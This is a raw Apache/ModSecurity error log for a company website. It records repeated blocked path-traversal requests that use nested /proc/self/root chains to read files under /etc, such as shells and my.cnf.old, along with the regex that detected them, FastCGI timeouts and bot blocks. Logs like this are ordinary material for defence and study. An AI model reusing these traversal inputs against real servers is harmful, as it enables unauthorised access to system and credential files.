[Thu Mar 19 11:32:10.137830 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:44526] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:32:20.994820 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:52670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwI9Mdf6f5d65gmYZR8YwAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:32:21.539129 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:52670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwI9cdf6f5d65gmYZR8ZQAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:32:24.339583 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:38890] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwI-AkwaGbbGflqUZDHeQAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:32:33.129817 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:45062] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:32:50.075756 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.243.128:38892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwJEl_V7PWP6ixUYl7BfgAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:32:55.162048 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:45498] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:33:21.226094 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:46032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:33:24.187269 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:47026] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwJNP-YZRR_7pZ7nDKQ9wAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:33:40.456535 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:43920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwJRAbLMZ6AikZjR9VicgAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:33:51.145996 2026] [proxy_fcgi:error] [pid 19093:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:46626] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:34:08.138361 2026] [core:alert] [pid 15826:tid 140411683178240] [client 57.141.18.13:49398] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 11:34:24.038976 2026] [proxy_fcgi:error] [pid 19093:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:47464] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:34:32.327305 2026] [core:alert] [pid 27403:tid 140411599251200] [client 57.141.18.53:49866] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 11:34:32.880881 2026] [mime_magic:error] [pid 26799:tid 140411674785536] (70014)End of file found: [client 57.141.18.75:49746] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:34:56.142770 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:48166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:35:26.100399 2026] [proxy_fcgi:error] [pid 30077:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48920] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:35:37.845859 2026] [mime_magic:error] [pid 17887:tid 140411658000128] (70014)End of file found: [client 57.141.18.31:50322] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 11:35:54.133837 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:49620] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:36:06.182665 2026] [core:alert] [pid 27403:tid 140411616036608] [client 57.141.18.32:51844] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 11:36:19.149793 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:50242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:36:27.418116 2026] [:error] [pid 30077:tid 140411725141760] [client 74.7.244.43:47906] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwJ6_u8EFLIOrSqIpusWwAAAkI"]
[Thu Mar 19 11:36:41.129790 2026] [proxy_fcgi:error] [pid 27403:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:50730] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:37:03.118063 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:51208] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:37:25.161789 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:51762] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:37:28.224835 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.243.128:57284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKKF_V7PWP6ixUYl7CKAAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:37:47.121859 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:52334] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:37:52.020784 2026] [core:alert] [pid 15826:tid 140411708356352] [client 57.141.18.119:53956] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 11:38:07.085184 2026] [:error] [pid 19093:tid 140411632822016] [client 74.7.243.128:53090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKT1_V7PWP6ixUYl7CRgAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:38:09.133813 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:52884] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:38:31.130149 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53436] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:38:38.087429 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:33740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKbsdf6f5d65gmYZR9bwAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:38:40.553438 2026] [:error] [pid 27293:tid 140411683178240] [client 74.7.241.31:35048] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKcP-YZRR_7pZ7nDKRggAAA8c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:38:42.365079 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:35058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKcsdf6f5d65gmYZR9cAAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:38:43.864663 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:35074] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKc-oXxyEfFpUF8f8TkQAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:38:53.149809 2026] [proxy_fcgi:error] [pid 14269:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:53932] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:38:58.756761 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:47744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKgl_V7PWP6ixUYl7CawAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 11:39:00.283535 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.243.128:45998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKhAbLMZ6AikZjR9VjDwAAABQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:39:08.941496 2026] [:error] [pid 17887:tid 140411540502272] [client 74.7.243.128:46014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKjAkwaGbbGflqUZDI4gAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 11:39:18.141855 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:54454] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:39:43.121810 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:40:01.961258 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:53788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKwfu8EFLIOrSqIpus2QAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 11:40:02.497055 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:53788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwKwvu8EFLIOrSqIpus2gAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 11:40:05.279638 2026] [:error] [pid 19093:tid 140411599251200] [client 74.7.228.61:60684] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abwKxV_V7PWP6ixUYl7CjQAAApE"]
[Thu Mar 19 11:40:16.354337 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55606] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:40:49.129809 2026] [proxy_fcgi:error] [pid 19093:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:56348] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:41:16.085818 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56886] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 11:41:35.230577 2026] [mime_magic:error] [pid 17887:tid 140411683178240] (70014)End of file found: [client 57.141.18.75:59458] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
